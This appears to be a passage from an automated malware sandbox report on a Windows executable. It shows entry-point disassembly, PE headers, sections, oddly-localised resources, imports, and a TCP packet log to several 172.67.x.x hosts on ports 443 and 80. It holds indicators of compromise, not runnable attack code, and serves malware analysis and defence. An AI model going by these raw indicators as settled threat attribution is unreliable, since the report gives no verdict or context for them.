                                                                                                                              test eax, eax
                                                                                                                              jne 00007FA3447E207Ch
                                                                                                                              push 0000001Ch
                                                                                                                              call 00007FA3447E21C0h
                                                                                                                              add esp, 04h
                                                                                                                              call 00007FA3447E4CD8h
                                                                                                                              test eax, eax
                                                                                                                              jne 00007FA3447E207Ch
                                                                                                                              push 00000010h
                                                                                                                              call 00007FA3447E21ADh
                                                                                                                              add esp, 04h
                                                                                                                              push 00000001h
                                                                                                                              call 00007FA3447EA2D3h
                                                                                                                              add esp, 04h
                                                                                                                              call 00007FA3447E80EBh
                                                                                                                              mov dword ptr [ebp-04h], 00000000h
                                                                                                                              call 00007FA3447E666Fh
                                                                                                                              test eax, eax

                                                                                                                              Rich Headers

                                                                                                                              Programming Language:
                                                                                                                              • [LNK] VS2010 build 30319
                                                                                                                              • [ASM] VS2010 build 30319
                                                                                                                              • [ C ] VS2010 build 30319
                                                                                                                              • [C++] VS2010 build 30319
                                                                                                                              • [RES] VS2010 build 30319
                                                                                                                              • [IMP] VS2008 SP1 build 30729

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x4391840x50.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2b310000x5e58.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x452a000x828.data
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b370000x1ac0.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x12500x1c.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4193f80x40.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x438d800x438e00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                              .data0x43a0000x26f68740x1600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x2b310000x5e580x6000False0.484375data5.06658660024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x2b370000x120e40x12200False0.0803879310345data1.03393734667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                              RT_CURSOR0x2b349700x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_CURSOR0x2b34ab80x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_CURSOR0x2b34be80xf0dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_CURSOR0x2b34cd80x10a8dBase III DBT, version number 0, next free block index 40Divehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_CURSOR0x2b35db00x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"Divehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_ICON0x2b314b00x8a8dataSpanishParaguay
                                                                                                                              RT_ICON0x2b31d580x6c8dataSpanishParaguay
                                                                                                                              RT_ICON0x2b324200x568GLS_BINARY_LSB_FIRSTSpanishParaguay
                                                                                                                              RT_ICON0x2b329880x10a8dataSpanishParaguay
                                                                                                                              RT_ICON0x2b33a300x988dataSpanishParaguay
                                                                                                                              RT_ICON0x2b343b80x468GLS_BINARY_LSB_FIRSTSpanishParaguay
                                                                                                                              RT_STRING0x2b367980x150dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_STRING0x2b368e80x252dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_STRING0x2b36b400x318dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_ACCELERATOR0x2b348e80x88dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_ACCELERATOR0x2b348800x68dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_GROUP_CURSOR0x2b34aa00x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_GROUP_CURSOR0x2b35d800x30dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_GROUP_CURSOR0x2b366580x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                              RT_GROUP_ICON0x2b348200x5adataSpanishParaguay
                                                                                                                              RT_VERSION0x2b366700x128dataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllGetConsoleAliasesLengthW, TlsGetValue, CommConfigDialogA, SetDllDirectoryW, InterlockedIncrement, _lwrite, ZombifyActCtx, GetSystemWindowsDirectoryW, GetNamedPipeHandleStateA, SetHandleInformation, SetConsoleScreenBufferSize, CancelWaitableTimer, FreeEnvironmentStringsA, CreateNamedPipeW, GetSystemTimeAsFileTime, GetPrivateProfileStringW, ReadConsoleW, GetWindowsDirectoryA, GetSystemWow64DirectoryA, QueryActCtxW, GetSystemTimes, GetSystemDirectoryW, GlobalFindAtomA, LoadLibraryW, GetConsoleMode, CopyFileW, SizeofResource, SetVolumeMountPointA, GetVersionExW, SetConsoleMode, HeapValidate, GetVolumePathNamesForVolumeNameW, VerifyVersionInfoA, SearchPathW, CreateActCtxA, GetACP, GetStartupInfoW, FindFirstFileExA, GetLastError, IsDBCSLeadByteEx, SetLastError, GetProcAddress, SetFirmwareEnvironmentVariableW, CopyFileA, GlobalGetAtomNameA, BuildCommDCBW, GetPrivateProfileStringA, OpenWaitableTimerW, LocalAlloc, IsWow64Process, WritePrivateProfileStringA, GetModuleFileNameA, WriteProfileStringA, SetConsoleCursorInfo, GetModuleHandleA, FindFirstChangeNotificationA, GetCurrentDirectoryA, CompareStringA, GetFileTime, SetProcessShutdownParameters, ReadConsoleInputW, FileTimeToLocalFileTime, TlsFree, GetProfileSectionW, CloseHandle, CreateFileW, GetModuleFileNameW, GetComputerNameA, DeleteFileA, MultiByteToWideChar, GetCommandLineA, HeapSetInformation, EncodePointer, DecodePointer, IsProcessorFeaturePresent, InterlockedDecrement, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetModuleHandleW, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, ExitProcess, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, IsBadReadPtr, HeapCreate, WriteFile, RaiseException, GetStringTypeW, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, LCMapStringW, SetFilePointer, GetConsoleCP, HeapAlloc, HeapReAlloc, HeapSize, HeapQueryInformation, HeapFree, FlushFileBuffers, SetStdHandle
                                                                                                                              USER32.dllGetMessageTime
                                                                                                                              GDI32.dllGetBitmapBits

                                                                                                                              Version Infos

                                                                                                                              DescriptionData
                                                                                                                              Translations0x0522 0x023c

                                                                                                                              Possible Origin

                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              Divehi; Dhivehi; MaldivianMaldives
                                                                                                                              SpanishParaguay

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 11, 2021 20:35:29.454935074 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.454983950 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.459800005 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.462728977 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.462758064 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.513391018 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.513986111 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.514008999 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.514801025 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.514812946 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.516657114 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.516674042 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.516801119 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.522042990 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.522221088 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.525162935 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.525177956 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.564548969 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.595845938 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.595900059 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.596199989 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.598005056 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.598031998 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.605093956 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.605174065 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.605380058 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.605423927 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.605441093 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.605453968 CET44349743172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.605468035 CET49743443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:29.676192045 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.676512003 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.676587105 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.677496910 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.677510977 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.678677082 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.678910971 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.680984974 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681046963 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681071043 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.681102991 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.681202888 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681231976 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.681263924 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681282997 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.681593895 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681629896 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.681829929 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681844950 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.681972027 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.681987047 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.682176113 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.682187080 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.761519909 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.761754036 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.762209892 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.762244940 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.762269974 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:29.762586117 CET49746443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:29.762598991 CET44349746172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.286147118 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.286190987 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.286298990 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.292198896 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.292224884 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.332607985 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.355088949 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.355134964 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.371582031 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.371598005 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.374650002 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.374768019 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.391681910 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.391897917 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.392049074 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.440787077 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.440824032 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.453526974 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.455398083 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.455548048 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.455576897 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:33.455593109 CET49747443192.168.2.3172.67.207.136
                                                                                                                              Nov 11, 2021 20:35:33.455605030 CET44349747172.67.207.136192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.443340063 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.443382978 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.443478107 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.445126057 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.445153952 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.507056952 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.508002043 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.508054018 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.508888960 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.508904934 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.512006044 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.512106895 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.514516115 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.514724970 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.514826059 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.514852047 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.600749016 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.600879908 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.604242086 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.604271889 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:37.604300022 CET49748443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:37.604312897 CET44349748172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.740056038 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.740098953 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.740302086 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.744684935 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.744713068 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.806196928 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.807106972 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.807138920 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.810728073 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.810741901 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.812640905 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.812771082 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.814904928 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.815067053 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.815124035 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.856882095 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.890927076 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.891064882 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.891472101 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.891506910 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.891524076 CET49750443192.168.2.3172.67.139.144
                                                                                                                              Nov 11, 2021 20:35:48.891536951 CET44349750172.67.139.144192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.935138941 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.951818943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.952110052 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.952845097 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.969556093 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993185043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993232965 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993280888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993334055 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.993354082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993401051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993438959 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.993448973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993493080 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993542910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993587017 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993638039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993653059 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.993690014 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993740082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993783951 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.993789911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993841887 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993886948 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993911028 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.993916988 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.993932009 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.993976116 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994008064 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994067907 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994101048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994153023 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994153976 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.994187117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994240046 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994293928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994299889 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.994322062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994373083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994405985 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994462013 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994494915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994548082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994571924 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.994589090 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994590998 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.994633913 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994682074 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994724989 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994741917 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.994781017 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994812965 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.994821072 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994854927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994908094 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994940042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994992971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.994993925 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.995039940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995083094 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995088100 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.995135069 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995203972 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995245934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995289087 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.995292902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995337009 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995368958 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:48.995381117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:48.995476007 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.011882067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.011935949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.011984110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012012959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012038946 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.012069941 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012114048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012146950 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012168884 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.012206078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012257099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012295008 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012329102 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012388945 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012413979 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.012438059 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012482882 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012516022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012568951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012602091 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012655020 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012661934 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.012698889 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012732983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012770891 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.012777090 CET4975180192.168.2.3172.67.196.11
